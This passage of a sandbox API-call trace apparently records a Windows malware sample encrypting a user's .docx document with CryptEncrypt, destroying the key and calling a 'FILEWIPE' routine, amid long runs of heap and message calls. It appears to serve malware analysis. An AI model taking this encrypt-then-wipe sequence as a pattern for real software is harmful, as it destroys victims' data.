hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.347] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.347] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.348] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x15694, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x156a0) returned 1 [0175.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.348] CharLowerBuffW (in: lpsz="byte[87713]", cchLength=0xb | out: lpsz="byte[87713]") returned 0xb [0175.350] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.350] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9efec0*, pdwDataLen=0x87e820*=0x15694, dwBufLen=0x156a0 | out: pbData=0x9efec0*, pdwDataLen=0x87e820*=0x156a0) returned 1 [0175.351] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.368] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0175.368] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.368] CryptDestroyKey (hKey=0x90aed8) returned 1 [0175.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.369] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.369] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.369] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0175.369] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.369] FreeLibrary (hLibModule=0x74f20000) returned 1 [0175.416] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0175.418] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace342c0, ftCreationTime.dwHighDateTime=0x1d5bd3c, ftLastAccessTime.dwLowDateTime=0xdfb517b0, ftLastAccessTime.dwHighDateTime=0x1d5e261, ftLastWriteTime.dwLowDateTime=0xdfb517b0, ftLastWriteTime.dwHighDateTime=0x1d5e261, nFileSizeHigh=0x0, nFileSizeLow=0x15694, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="NqZsz9XCQqe D7p.docx", cAlternateFileName="NQZSZ9~1.DOC")) returned 0x90ae18 [0175.418] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0175.418] CharLowerBuffW (in: lpsz="byte[87700]", cchLength=0xb | out: lpsz="byte[87700]") returned 0xb [0175.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0175.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.420] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0175.420] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.420] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0175.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.421] FreeLibrary (hLibModule=0x75c90000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.422] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0175.423] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0175.423] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0175.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0175.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0175.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0175.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0175.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0175.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0175.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0175.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0175.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0175.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 